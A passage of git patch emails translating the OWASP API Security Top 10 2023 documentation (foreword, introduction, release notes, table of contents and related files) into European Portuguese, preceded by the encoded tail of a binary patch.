zv{$3Z%w2j9Awj5QpJ}Xo19b*E$Sbg!CL?_lMbtHrP}$-3IL`j`NbX zNF|xv97dmbu7Lx$vOF=3q=fr5&kPrmD=*0duaT6;{+UU|nM z7`Nuxv_`URc~t*$vNOar+UQ(bY+%*`L#P7zsAa@Q(l)K#c&_VCKLjS5^_zn%gjJRO zJ$rv{s&b%T^(|QjWwP5qnQ+`=F)elmHK(1C9LlB)C|W1P&3nfU6I^pUJ9b6EuP=Kq zo`v(YG?kM!8cm~|$dzf)?BeE7L#e7&EsBt`mw?T4xiQ#D$y$+goBYZu1wgplsGLx_!g~;zWfieXr1+KOo@Y@i1 z+_Tbur?VU&UIt3IYB@?#_#Fg7HpoYR9QK~?OK>v)nZkFPI%o@$79J$;WNsjfrF zb46Rv&HjhLHp_Sm;+R`?vUpA)_^on=8)QiW3;R{Hh^#HV@bm|*a*GM+#AqWuDcTPcK>}WDKx6c=?g3LoI#@jUR9RHUwmG*Mtj)iqxtki6n;kPH@ z6m9E953|9Q753pQensprHj|0fTe2#@cMEJ-r)A0OmC zee-RXO{29h389IID+p&WPQ| z+v2l0b_0TmN=DCzJsB=F+*2bS?z}pn zBD^E0FozO3Tib}6;nU9Hxr56^{(GI##G01n$n97ot3KfL8~c~N{Y#BVvRG5QVjP`o ztJ{4Zuw@#~XGYU7r9!)o-fC;9XZ9qPJKIq}KKQsoC;efSOgk;mjkQ@E@>8E|wEuji zXw}6F*D?`gv1(-yLc)O=8?#M3H04=p-4Nm7xjiRMH4Mb8NT3Fec%8kujAVCo#F8ta zCdRzI_GDTtoeIxf8D1a-B!SsmmB$VlOL&7H*fA|8qMn0n_1`Zl6(H9<3x-fP>$tdk zETr)aFqYkkt7h}-{g|d%7kMr4udaZV?R9TVWJz-rE&kvGeXpG|z0qW6`ZV3cS<4z| zVSW1^`L}CD!O};X->P&ZAEG-Z7o?)*mv?SuWf)OGFyQcDyQZ9-#%?>SXcF21%YVD~ zj>Vg)6iHliRdc?>7^X}&ME*=#yEUG-(!pyw7Z3PmS-yERvK>DF;vaX1^|HXQb$mo7*Gj!}90xe^ZEB_~-t@zPUSrj>IpXvjm3zuo~}&)H}&-|J9)x zz0@T6Z*X?12^xkI3wKsRoR8hnTi4B6M-+3!A&MPzv2Dn*A?xvSTxo3Y*Z2APkdg2* zc43P<;R;bKp(?EZ3Lxk+TD!2{^T9xll7e++nc9ws#=$C!)8jwBI6d;I(1PeTS<9~t zQa*BE{){YD_O)Z*|0<^ zc5XJckAflIsfQ8Nhhq5qVME{2A@^-jWUX8EO#;f0nLlX(S*4F)1@5K6R}pX*#fl6h z^Oml`=tHNe?8aliyp$aWU9B%8t&Awi(~1Vl0o%h~r>XLRebkb8fs^Gke&>1}goUuS>6Uu%l|S5vS+Y{k)rEiChcS^u$R z_NLqV);MYzja_EGbi6FMicu)u8HM1j@vQha)<~fZYs_^**+Z9gbg$&kvG;!U19?Yy zuZKWDD62vZbaINSr@d~=;b>#;eaz)_nH%yt)DSxY(b}w7CMST3KXkGHs#?pJEIOq^hZ=jlYQ6cg~1PgEh$HGGX?o^ zVFD(qc5VRz_ooiAd~KH(VO$CB8_`FXt^cqKDXNeJ-Q{pEID9>~m9x96ac= z);@+~XjgF}YU8UesSJn$&^wU0A#Kjm)UB^MICH z%_M+WHx##^TV+SE=HShspqB(K>h2t-@91KtS#S-kqCcT`e!h9)FcPBCdA*l*>A92B zHji%|*=+6=PEB~xqUm2>UVAr$641Q}JKQ4J;*qqH1zuj^kRw-(1fae_QwV-uyJ?gu z_We9B03dWxLP~44WhbC~9b)dc=6V_J&<|h+q2JSsThx#xoUNMkZE`j+|1&Esi9lPQ4LRm7>wLl!`uxL{CdyI$DT9eyQ# zxp#;1l4-f3p8K{4ow{TmnGEO-pkQT+5Qd!^UQFawPVfi;3L#oo%b9!v&YbK~ZJvUq zLo2z9et<{p8nk@*XE^LjPocw0Ji{dv4r|p2c^yeA&}Zl>or0b&E@KX+>&60}u>@;J zl3Fs;9;S2}!;kAgX!HC@i4#z)5PS8HgI9`2_CzTiv(hOe4x1hei-ZsQF?rU>oR_hT zI~P2YCp#f)2x#y~j2cs0_o4>A!tP^5u?}yhJPBaBAotd_TIW`YN=O+PyIfhLoPtN5AQ;MaU`MDGNo`X6m2t>(Lh(9&rkye{=zYAAWvuLObpQaU ztmzR_4Y~X=8-8^-oPjr_<&(*gh}Rw?<3zRDYZjO}xJv;Z$#kk%>lZ$sY9hXbv09%o z5R_UU&h?oE@GjY6N3{wV9gcy3s1Y55157GS_*MMoq~pd0|B37Stmi2N1M>!6EHYxyTp(f+oaz~<;`otXdlZIybYipkFEZ!X)72Xw4f;;&3kxK;;mY;%^NBWk}Kee>RW zRiVnuI_}p(5RvcA(OJkfm&_xDRg}zwS|2%)05H7n6v(p9<0}Sd_2!gxvw;8hUyP-d z#GdS1IB7@UFqM`MHVB{Z4^5p>>Sj*7(hoo!yt?d;vtgezp86~c3lLZyMDk$h)qGP` z%E|tYXKcu$CGE;i{R$e%j-a7te}eBs%up+x6^%lu!d1}Qho_snYXou)6Eq)UrHPzU ztac<2WzexQ`$NcDg0p}N#X)45qFe!ibpxmKy}Lk7(C~<8IbU}@kZ`6nVS1Z{z|Sb> zASn44-~7rFZ=k+gHgVa2NQr+30KCPJLylz0{t?dJ7v)pAB{2&V)a!o2d)QBk+7A-Y znvOs^PARM@0neVJi%5@?_%?PidXm+?eM^!zQ1Sd*YJ{XHQJ5xzegVlA2=u6Ew@BTG z$<{*hXDQw{8kF6+w@CT6?-9fvV}_YwGAYM;y^%@(V{%!~uD+R{O2KiyC)C4(!)HrY zug|-u9FOoTSCmB=28E>ut{ Date: Sat, 16 Dec 2023 23:07:55 +0000 Subject: [PATCH 02/64] 0x00-header.md --- editions/2023/pt-pt/0x00-header.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/editions/2023/pt-pt/0x00-header.md b/editions/2023/pt-pt/0x00-header.md index d3936a8b2..2b26af67e 100644 --- a/editions/2023/pt-pt/0x00-header.md +++ b/editions/2023/pt-pt/0x00-header.md @@ -1,13 +1,13 @@ --- title: '' -description: OWASP API Security Top 10 2023 edition +description: OWASP API Security Top 10 2023 --- ![OWASP LOGO](images/cover.jpg) | | | | | - | - | - | -| https://owasp.org | This work is licensed under a [Creative Commons Attribution-ShareAlike 4.0 International License][1] | ![Creative Commons License Logo](images/front-cc.png) | +| https://owasp.org | Distribuído ao abrigo da licença [Creative Commons Attribution-ShareAlike 4.0 International License][1] | ![Creative Commons License Logo](images/front-cc.png) | [1]: http://creativecommons.org/licenses/by-sa/4.0/ From 6b62091d937cf463181efb84d0fddc2d2a905489 Mon Sep 17 00:00:00 2001 From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com> Date: Sat, 16 Dec 2023 23:20:13 +0000 Subject: [PATCH 03/64] 0x00-notice.md --- editions/2023/pt-pt/0x00-notice.md | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/editions/2023/pt-pt/0x00-notice.md b/editions/2023/pt-pt/0x00-notice.md index c40368695..275675afc 100644 --- a/editions/2023/pt-pt/0x00-notice.md +++ b/editions/2023/pt-pt/0x00-notice.md @@ -1,11 +1,10 @@ -# Notice +# Nota -This is the text version of OWASP API Security Top 10, used as source for any -official versions of this document such the web site. +Esta é a versão de texto do OWASP API Security Top 10, usada como fonte para quaisquer versões oficiais deste documento como por exemplo o website. -Contributions to the project such as comments, corrections, or translations -should be done here. For details on [How To Contribute][1], please refer to -[CONTRIBUTING.md][1]. +Contribuições para o projeto tais como comentários, correções ou traduções devem +ser feitas aqui. Para mais detalhes sobre [Como Contribuir][1], por favor +consulte a secção [CONTRIBUTING.md][1]. * Erez Yallon * Inon Shkedy From 84df457acb37604b75ea7907dd7c9b10fb7a8bac Mon Sep 17 00:00:00 2001 From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com> Date: Sat, 16 Dec 2023 23:31:35 +0000 Subject: [PATCH 04/64] 0x00-toc.md --- editions/2023/pt-pt/0x00-toc.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/editions/2023/pt-pt/0x00-toc.md b/editions/2023/pt-pt/0x00-toc.md index ca93bd5ba..0805d5232 100644 --- a/editions/2023/pt-pt/0x00-toc.md +++ b/editions/2023/pt-pt/0x00-toc.md @@ -1,11 +1,11 @@ -# Table of Contents +# Tabela de Conteúdos -* [Table of Contents](0x00-toc.md) -* [About OWASP](0x01-about-owasp.md) -* [Foreword](0x02-foreword.md) -* [Introduction](0x03-introduction.md) -* [Release Notes](0x04-release-notes.md) -* [API Security Risks](0x10-api-security-risks.md) +* [Tabela de Conteúdos](0x00-toc.md) +* [Sobre a OWASP](0x01-about-owasp.md) +* [Prefácio](0x02-foreword.md) +* [Introdução](0x03-introduction.md) +* [Notas da Versão](0x04-release-notes.md) +* [Riscos de Segurança em APIs](0x10-api-security-risks.md) * [OWASP Top 10 API Security Risks – 2023](0x11-t10.md) * [API1:2023 Broken Object Level Authorization](0xa1-broken-object-level-authorization.md) * [API2:2023 Broken Authentication](0xa2-broken-authentication.md) @@ -17,7 +17,7 @@ * [API8:2023 Security Misconfiguration](0xa8-security-misconfiguration.md) * [API9:2023 Improper Inventory Management](0xa9-improper-inventory-management.md) * [API10:2023 Unsafe Consumption of APIs](0xaa-unsafe-consumption-of-apis.md) -* [What's Next For Developers](0xb0-next-devs.md) -* [What's Next For DevSecOps](0xb1-next-devsecops.md) -* [Methodology and Data](0xd0-about-data.md) -* [Acknowledgments](0xd1-acknowledgments.md) +* [O Que Se Segue Para Programadores](0xb0-next-devs.md) +* [O que Se Segue Para DevSecOps](0xb1-next-devsecops.md) +* [Metodologia e Dados](0xd0-about-data.md) +* [Agradecimentos](0xd1-acknowledgments.md) From c96d06da7f4412e843a0427393cb4af9163e1207 Mon Sep 17 00:00:00 2001 From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 17 Dec 2023 11:37:41 +0000 Subject: [PATCH 05/64] 0x00-about-owasp.md --- editions/2023/pt-pt/0x01-about-owasp.md | 73 +++++++++++++------------ 1 file changed, 38 insertions(+), 35 deletions(-) diff --git a/editions/2023/pt-pt/0x01-about-owasp.md b/editions/2023/pt-pt/0x01-about-owasp.md index 1a7e05126..5027f41dd 100644 --- a/editions/2023/pt-pt/0x01-about-owasp.md +++ b/editions/2023/pt-pt/0x01-about-owasp.md @@ -1,53 +1,56 @@ -# About OWASP +# Sobre a OWASP -The Open Worldwide Application Security Project (OWASP) is an open community -dedicated to enabling organizations to develop, purchase, and maintain -applications and APIs that can be trusted. +Open Worldwide Application Security Project (OWASP) é uma comunidade aberta que +se dedica a ajudar as organizações a desenvolver, adquirir e manter aplicações e +APIs confiáveis. -At OWASP, you'll find free and open: +A OWASP disponibiliza de forma livre e aberta: -* Application security tools and standards. -* Complete books on application security testing, secure code development, and - secure code review. -* Presentations and [videos][1]. -* [Cheat sheets][2] on many common topics. -* Standard security controls and libraries. -* [Local chapters worldwide][3]. -* Cutting edge research. -* Extensive [conferences worldwide][4]. -* [Mailing lists][5] ([archive][6]). +* Ferramentas e normas de segurança aplicacional. +* Livros completos sobre testes de segurança aplicacional, desenvolvimento + de código seguro e revisão de código focada em segurança. +* Apresentações e [vídeos][1]. +* [_Cheat Sheets_][2] sobre assuntos diversos. +* Controlos e bibliotecas de segurança _standard_. +* [Comunidades locais espalhadas por todo o mundo][3]. +* Investigação de ponta. +* Múltiplas [conferências em todo o mundo][4]. +* [Listas de discussão][5] ([arquivo][6]). -Learn more at: [https://www.owasp.org][7]. +Mais informação em: [https://www.owasp.org][7]. -All OWASP tools, documents, videos, presentations, and chapters are free and -open to anyone interested in improving application security. +Todas as ferramentas, documentos, vídeos, apresentações e comunidades locais da +OWASP são livres e abertos a todos os interessados em melhorar a segurança +aplicacional. -We advocate approaching application security as a people, process, and -technology problem, because the most effective approaches to application -security require improvements in these areas. +Aconselhamos uma abordagem à segurança aplicacional como sendo um problema de +pessoas, processos e tecnologia, porque as abordagens mais eficazes à segurança +aplicacional necessitam de melhorias em todas estas áreas. -OWASP is a new kind of organization. Our freedom from commercial pressures -allows us to provide unbiased, practical, and cost-effective information about -application security. +A OWASP é um novo tipo de organização. A nossa independência em relação a +pressões comerciais permite-nos fornecer informação imparcial, prática e +economicamente adequada sobre a segurança aplicacional. -OWASP is not affiliated with any technology company, although we support the -informed use of commercial security technology. OWASP produces many types of -materials in a collaborative, transparent, and open way. +A OWASP não está afiliada com nenhuma empresa tecnológica, embora suportemos o +uso informado de tecnologias de segurança comerciais. A OWASP produz muitos +tipos de materiais de uma forma colaborativa, transparente e aberta. -The OWASP Foundation is the non-profit entity that ensures the project's -long-term success. Almost everyone associated with OWASP is a volunteer, -including the OWASP board, chapter leaders, project leaders, and project -members. We support innovative security research with grants and infrastructure. +A fundação OWASP é uma entidade sem fins lucrativos o que assegura o sucesso a +longo prazo do projeto. Quase todas as pessoas associadas à OWASP são +voluntárias, incluindo a direção da OWASP, os líderes das comunidades locais, os +líderes dos projetos e os seus membros. Suportamos investigação inovadora em +segurança através de bolsas e infraestrutura. -Come join us! +Junte-se a nós! ## Copyright and License ![license](images/license.png) -Copyright © 2003-2023 The OWASP Foundation. This document is released under the -[Creative Commons Attribution Share-Alike 4.0 license][8]. For any reuse or -distribution, you must make it clear to others the license terms of this work. +Copyright © 2003-2023 The OWASP Foundation. Este documento é distribuído de +acordo com a licença [Creative Commons Attribution Share-Alike 4.0 license][8]. +Para qualquer tipo de reutilização ou distribuição, deve deixar claro para +terceiros os termos da licença deste trabalho. [1]: https://www.youtube.com/user/OWASPGLOBAL [2]: https://cheatsheetseries.owasp.org/ From c34ae88aadf6ab4e00812e1db515f8ab9db008a1 Mon Sep 17 00:00:00 2001 From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 17 Dec 2023 16:56:16 +0000 Subject: [PATCH 06/64] 0x02-foreword.md --- editions/2023/pt-pt/0x02-foreword.md | 64 +++++++++++++++------------- 1 file changed, 34 insertions(+), 30 deletions(-) diff --git a/editions/2023/pt-pt/0x02-foreword.md b/editions/2023/pt-pt/0x02-foreword.md index 944acfc82..500ff338f 100644 --- a/editions/2023/pt-pt/0x02-foreword.md +++ b/editions/2023/pt-pt/0x02-foreword.md @@ -1,41 +1,45 @@ -# Foreword - -A foundational element of innovation in today's app-driven world is the -Application Programming Interface (API). From banks, retail, and transportation -to IoT, autonomous vehicles, and smart cities, APIs are a critical part of -modern mobile, SaaS, and web applications and can be found in customer-facing, -partner-facing, and internal applications. - -By nature, APIs expose application logic and sensitive data such as Personally -Identifiable Information (PII) and because of this, APIs have increasingly -become a target for attackers. Without secure APIs, rapid innovation would be -impossible. - -Although a broader web application security risks Top 10 still makes sense, due -to their particular nature, an API-specific security risks list is required. -API security focuses on strategies and solutions to understand and mitigate the -unique vulnerabilities and security risks associated with APIs. - -If you're familiar with the [OWASP Top 10 Project][1], then you'll notice the -similarities between both documents: they are intended for readability and -adoption. If you're new to the OWASP Top 10 series, you may be better off -reading the [API Security Risks][2] and [Methodology and Data][3] sections -before jumping into the Top 10 list. - -You can contribute to OWASP API Security Top 10 with your questions, comments, -and ideas at our GitHub project repository: +# Prefácio + +As APIs - _Application Programming Interface_ têm um papel fundamental na +inovação que observamos nos dias de hoje ao nível das aplicações. Desde a banca, +retalho e transportes à Internet das Coisas (IoT), veículos autónomos e _Smart +Cities_, as APIs são hoje um elemento crítico nas aplicações móveis, _Software +as a Service_ (SaaS) e aplicações web, sejam elas destinadas ao público em +geral, parceiros de negócio ou para uso interno das organizações. + +Por definição as APIs expõem lógica aplicacional e dados sensíveis tais como +informação pessoal (PII - _Personally Identifiable Information_), motivo pelo +qual se têm vindo a tornar um alvo para os atacantes. Se não conseguirmos +garantir a segurança das APIs será impossível continuar a inovar a um ritmo +acelerado. + +Apesar de continuar a fazer sentindo manter uma lista dos 10 principais +problemas de segurança em aplicações web, devido à natureza particular das APIs, +é importante haver também uma tal lista específica para APIs. +A segurança das APIs foca-se nas estratégias e soluções para compreender e +mitigar as vulnerabilidades e risco de segurança associado às APIs. + +Se estiver familiarizado com o projeto [OWASP Top 10][1] com certeza notará as +semelhanças entre os documentos: elas são propositadas para facilitar a leitura +e adoção deste. Se por outro lado for a primeira vez que tem contacto com um +documento da série OWASP Top 10, sugerimos que comece por ler as secções [Riscos +de Segurança em APIs][2] e [Metodologia e Dados][3] antes de aprofundar a lista +dos dez problemas de segurança mais críticos em APIs. + +Pode contribuir para o OWASP API Security Top 10 com perguntas, comentários e +ideias no repositório do projeto no GitHub: * https://owasp.org/www-project-api-security/ * https://github.com/OWASP/API-Security/blob/master/CONTRIBUTING.md -You can find the OWASP API Security Top 10 here: +Pode ainda encontrar o OWASP API Security Top 10 em: * https://owasp.org/www-project-api-security/ * https://github.com/OWASP/API-Security -We wish to thank all the contributors who made this project possible with their -effort and contributions. They are all listed in the [Acknowledgments -section][4]. Thank you! +Gostaríamos de agradecer a todos os que participaram neste projeto, tornando-o +possível com o seu empenho e contribuições. A lista de contribuidores +encontra-se na secção [Agradecimentos][4]. Obrigado! [1]: https://owasp.org/www-project-top-ten/ [2]: ./0x10-api-security-risks.md From 6c68031a474253e6310bba88674093856e1dc307 Mon Sep 17 00:00:00 2001 From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 17 Dec 2023 19:03:08 +0000 Subject: [PATCH 07/64] 0x03-introduction.md --- editions/2023/pt-pt/0x03-introduction.md | 49 ++++++++++++------------ 1 file changed, 24 insertions(+), 25 deletions(-) diff --git a/editions/2023/pt-pt/0x03-introduction.md b/editions/2023/pt-pt/0x03-introduction.md index 752492b1f..1e2a15929 100644 --- a/editions/2023/pt-pt/0x03-introduction.md +++ b/editions/2023/pt-pt/0x03-introduction.md @@ -1,26 +1,26 @@ -# Introduction +# Introdução -## Welcome to the OWASP API Security Top 10 - 2023! +## Bem-vindo ao OWASP API Security Top 10 - 2023! -Welcome to the second edition of the OWASP API Security Top 10! +Bem-vindo à segunda edição do OWASP API Security Top 10! -This awareness document was first published back in 2019. Since then, the API -Security industry has flourished and become more mature. We strongly believe -this work has positively contributed to it, due to it being quickly adopted as -an industry reference. +Este documento de consciencialização foi publicado pela primeira vez em 2019. +Desde então, a indústria de segurança das APIs cresceu e ganhou maturidade. Nós +acreditamos fortemente que este trabalho contribuiu positivamente para tal, +devido a ter sido adotado rapidamente como referência na indústria. -APIs play a very important role in modern application architecture. But since -innovation has a different pace than creating security awareness, we believe -it's important to focus on creating awareness for common API security -weaknesses. +As APIs desempenham um papel muito importante na arquitetura das aplicações +modernas. Devido à inovação ter um ritmo diferente do que a sensibilização +para a segurança, nós acreditamos que é importante concentrarmo-nos nas +falhas de segurança mais comuns das APIs. -The primary goal of the OWASP API Security Top 10 is to educate those involved -in API development and maintenance, for example, developers, designers, -architects, managers, or organizations. You can know more about the API Security -Project visiting [the project page][1]. +O objetivo principal do OWASP API Security Top 10 é educar todos aqueles +envolvidos no desenvolvimento e manutenção de APIs, como por exemplo, +programadores, _designers_, arquitetos, gestores ou organizações. Pode saber +mais sobre o projeto API Security visitando a [página do projeto][1]. -If you're not familiar with the OWASP top 10 series, we recommend checking at -least the following top 10 projects: +Se não estiver familiarizado com a série OWASP Top 10, nós recomendamos que veja +pelo menos os seguintes projetos Top 10: * [OWASP Cloud-Native Application Security Top 10][2] * [OWASP Desktop App Security Top 10][3] @@ -34,15 +34,14 @@ least the following top 10 projects: * [OWASP Top 10 Privacy Risks][11] * [OWASP Serverless Top 10][12] -None of the projects replaces another: if you're working on a mobile application -powered by a back-end API, you're better off reading both the corresponding top -10's. The same is valid if you're working on a web or desktop application -powered by APIs. +Nenhum destes projetos substitui qualquer outro: se está a trabalhar numa +aplicação móvel alimentada por uma API, então é melhor ler os dois documentos +Top 10 correspondentes. O mesmo é válido se estiver a trabalhar num website ou +numa aplicação desktop alimentados por APIs. -In the [Methodology and Data][13] section, you can read more about how this -edition was created. For now, we encourage everyone to contribute with -questions, comments, and ideas at our [GitHub repository][14] or -[Mailing list][15]. +Na secção [Metodologia e Dados][13] pode ler mais sobre como esta edição foi +criada. Por agora encorajamos todos a contribuírem com perguntas, comentários e +ideias no nosso [repositório no GitHub][14] ou através da [_Mailing list_][15]. [1]: https://owasp.org/www-project-api-security/ [2]: https://owasp.org/www-project-cloud-native-application-security-top-10/ From 4450656e5238ec389c8ef974aa7290a0314b910e Mon Sep 17 00:00:00 2001 From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 17 Dec 2023 19:12:58 +0000 Subject: [PATCH 08/64] fix language typo --- editions/2019/mkdocs.yml | 4 ++-- editions/2023/mkdocs.yml | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/editions/2019/mkdocs.yml b/editions/2019/mkdocs.yml index ccc52dbba..d78a30bd6 100644 --- a/editions/2019/mkdocs.yml +++ b/editions/2019/mkdocs.yml @@ -15,9 +15,9 @@ extra: lang: fr - name: Greek (Greece) lang: el-gr - - name: Portugês (Brasil) + - name: Português (Brasil) lang: pt-BR - - name: Portugês (Portugal) + - name: Português (Portugal) lang: pt-pt - name: Russian lang: ru diff --git a/editions/2023/mkdocs.yml b/editions/2023/mkdocs.yml index 4f9537dc8..d66330398 100644 --- a/editions/2023/mkdocs.yml +++ b/editions/2023/mkdocs.yml @@ -6,5 +6,5 @@ extra: - name: English lang: en alternate: - - name: Portugês (Portugal) + - name: Português (Portugal) lang: pt-pt From 262d9772afbd8cb4338798f43390901ea02fad22 Mon Sep 17 00:00:00 2001 From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 29 Dec 2023 11:18:53 +0000 Subject: [PATCH 09/64] 0x04-release-notes.md paragraph --- editions/2023/pt-pt/0x04-release-notes.md | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/editions/2023/pt-pt/0x04-release-notes.md b/editions/2023/pt-pt/0x04-release-notes.md index bff6dc01c..2a0fb0809 100644 --- a/editions/2023/pt-pt/0x04-release-notes.md +++ b/editions/2023/pt-pt/0x04-release-notes.md @@ -1,12 +1,12 @@ -# Release Notes - -This is the second edition of the OWASP API Security Top 10 edition, exactly -four years after its first release. A lot has changed in the API (security) -scene. API traffic increased at a fast pace, some API protocols gained a lot -more traction, many new API security vendors/solutions have popped up, and, of -course, attackers have developed new skills and techniques to compromise -APIs. It was about time to get the list of the ten most critical API security -risks updated. +# Notas da Versão + +Esta é a segunda edição do OWASP API Security Top 10, exatamente quatro anos +após a primeira versão. Muito mudou no panorama das API (a nível de +segurança). O tráfego das API aumentou a um ritmo acelerado, alguns protocolos +de API ganharam muito mais popularidade, surgiram muitos novos vendedores/ +soluções de segurança para API e, claro, os atacantes desenvolveram novas +capacidades e técnicas para comprometer APIs. Já era hora de atualizar a lista +dos dez riscos de segurança de API mais críticos. With a more mature API security industry, for the first time, there was [a public call for data][1]. Unfortunately, no data was contributed, but based on From 362fb1995ca1387679e4b2dc9d2d19522b588a5f Mon Sep 17 00:00:00 2001 From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com> Date: Sat, 30 Dec 2023 12:00:33 +0000 Subject: [PATCH 10/64] 0x04-release-notes.md paragraph 2 --- editions/2023/pt-pt/0x04-release-notes.md | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/editions/2023/pt-pt/0x04-release-notes.md b/editions/2023/pt-pt/0x04-release-notes.md index 2a0fb0809..50cc9a0bf 100644 --- a/editions/2023/pt-pt/0x04-release-notes.md +++ b/editions/2023/pt-pt/0x04-release-notes.md @@ -8,13 +8,14 @@ soluções de segurança para API e, claro, os atacantes desenvolveram novas capacidades e técnicas para comprometer APIs. Já era hora de atualizar a lista dos dez riscos de segurança de API mais críticos. -With a more mature API security industry, for the first time, there was [a -public call for data][1]. Unfortunately, no data was contributed, but based on -the project's team experience, careful API security specialist review, and -community feedback on the release candidate, we built this new list. In the -[Methodology and Data section][2], you'll find more details about how this -version was built. For more details about the security risks please refer to the -[API Security Risks section][3]. +Com uma indústria de segurança de API mais madura, pela primeira vez, houve [um + apelo público para dados][1]. Infelizmente, não foram fornecidos dados, mas + com base na experiência da equipa do projeto, numa análise cuidadosa por + especialistas em segurança de API e no feedback da comunidade sobre a versão + preliminar, construímos esta nova lista. Na [secção Metodologia e Dados][2], + encontrará mais detalhes sobre como esta versão foi elaborada. Para mais + detalhes sobre os riscos de segurança, consulte a [secção Riscos de Segurança + em APIs][3]. The OWASP API Security Top 10 2023 is a forward-looking awareness document for a fast pace industry. It does not replace other TOP 10's. In this edition: From 9a6a8dbdd1559bd52450948b8034b2987b1d7054 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 19 Apr 2024 15:32:56 +0100 Subject: [PATCH 11/64] Update 0x01-about-owasp.md --- editions/2023/pt-pt/0x01-about-owasp.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/editions/2023/pt-pt/0x01-about-owasp.md b/editions/2023/pt-pt/0x01-about-owasp.md index 5027f41dd..a9b862987 100644 --- a/editions/2023/pt-pt/0x01-about-owasp.md +++ b/editions/2023/pt-pt/0x01-about-owasp.md @@ -43,7 +43,7 @@ segurança através de bolsas e infraestrutura. Junte-se a nós! -## Copyright and License +## Direitos de Autor e Licença ![license](images/license.png) From 3c91411cf7e7fedc6030e983805b1c73d3680c42 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 19 Apr 2024 16:38:51 +0100 Subject: [PATCH 12/64] Update 0x04-release-notes.md --- editions/2023/pt-pt/0x04-release-notes.md | 66 +++++++++++------------ 1 file changed, 33 insertions(+), 33 deletions(-) diff --git a/editions/2023/pt-pt/0x04-release-notes.md b/editions/2023/pt-pt/0x04-release-notes.md index 50cc9a0bf..a2d8274bb 100644 --- a/editions/2023/pt-pt/0x04-release-notes.md +++ b/editions/2023/pt-pt/0x04-release-notes.md @@ -8,39 +8,39 @@ soluções de segurança para API e, claro, os atacantes desenvolveram novas capacidades e técnicas para comprometer APIs. Já era hora de atualizar a lista dos dez riscos de segurança de API mais críticos. -Com uma indústria de segurança de API mais madura, pela primeira vez, houve [um - apelo público para dados][1]. Infelizmente, não foram fornecidos dados, mas - com base na experiência da equipa do projeto, numa análise cuidadosa por - especialistas em segurança de API e no feedback da comunidade sobre a versão - preliminar, construímos esta nova lista. Na [secção Metodologia e Dados][2], - encontrará mais detalhes sobre como esta versão foi elaborada. Para mais - detalhes sobre os riscos de segurança, consulte a [secção Riscos de Segurança - em APIs][3]. - -The OWASP API Security Top 10 2023 is a forward-looking awareness document for -a fast pace industry. It does not replace other TOP 10's. In this edition: - -* We've combined Excessive Data Exposure and Mass Assignment focusing on the - common root cause: object property level authorization validation failures. -* We've put more emphasis on resource consumption, over focusing on the pace - they are exhausted. -* We've created a new category "Unrestricted Access to Sensitive Business Flows" - to address new threats, including most of those that can be mitigated using - rate limiting. -* We added "Unsafe Consumption of APIs" to address something we've started - seeing: attackers have started looking for a target's integrated services to - compromise those, instead of hitting the APIs of their target directly. This - is the right time to start creating awareness about this increasing risk. - -APIs play an increasingly important role in modern microservices architecture, -Single Page Applications (SPAs), mobile apps, IoT, etc. The OWASP API Security -Top 10 is a required effort to create awareness about modern API security -issues. - -This update was only possible due to the great effort of several volunteers, -listed in the [Acknowledgments][4] section. - -Thank you! +Com uma indústria de segurança de API mais madura, pela primeira vez, houve [um +apelo público para dados][1]. Infelizmente, não foram fornecidos dados, mas +com base na experiência da equipa do projeto, numa análise cuidadosa por +especialistas em segurança de API e no feedback da comunidade sobre a versão +preliminar, construímos esta nova lista. Na [secção Metodologia e Dados][2], +encontrará mais detalhes sobre como esta versão foi elaborada. Para mais +detalhes sobre os riscos de segurança, consulte a [secção Riscos de Segurança +em APIs][3]. + +O OWASP API Security Top 10 2023 é um documento de sensibilização prospetivo +para uma indústria de ritmo acelerado. Não substitui outros TOP 10. Nesta edição: + +* Combinámos *Excessive Data Exposure* e *Mass Assignment*, focando na causa + comum: falhas na validação de autorização ao nível das propriedades do objeto. +* Damos mais ênfase ao consumo de recursos, em vez de nos concentrarmos na rapidez + com que são esgotados. +* Criámos uma nova categoria "*Unrestricted Access to Sensitive Business Flows*" + para abordar novas ameaças, incluindo a maioria daquelas que podem ser mitigadas + através de *rate limiting*. +* Adicionámos "*Unsafe Consumption of APIs*" para abordar algo que começámos a + observar: os atacantes começaram a procurar serviços integrados de um alvo para + os comprometer, em vez de atingirem diretamente as APIs do seu alvo. Este é o + momento certo para começar a sensibilizar sobre este risco crescente. + +As APIs desempenham um papel cada vez mais importante na arquitetura moderna de +microsserviços, *Single Page Applications* (SPAs), aplicações móveis, Internet das +Coisas (IoT), etc. O OWASP API Security Top 10 é um esforço necessário para criar +sensibilização sobre os problemas de segurança modernos das APIs. + +Esta atualização só foi possível devido ao grande esforço de vários voluntários, +listados na secção de [Agradecimentos][4]. + +Obrigado! [1]: https://owasp.org/www-project-api-security/announcements/cfd/2022/ [2]: ./0xd0-about-data.md From 73d1865577e0614206357f2c79fb9cf1a2569225 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 19 Apr 2024 17:00:36 +0100 Subject: [PATCH 13/64] Update 0x10-api-security-risks.md --- .../2023/pt-pt/0x10-api-security-risks.md | 42 ++++++++++--------- 1 file changed, 22 insertions(+), 20 deletions(-) diff --git a/editions/2023/pt-pt/0x10-api-security-risks.md b/editions/2023/pt-pt/0x10-api-security-risks.md index c9d284b14..7efa9b041 100644 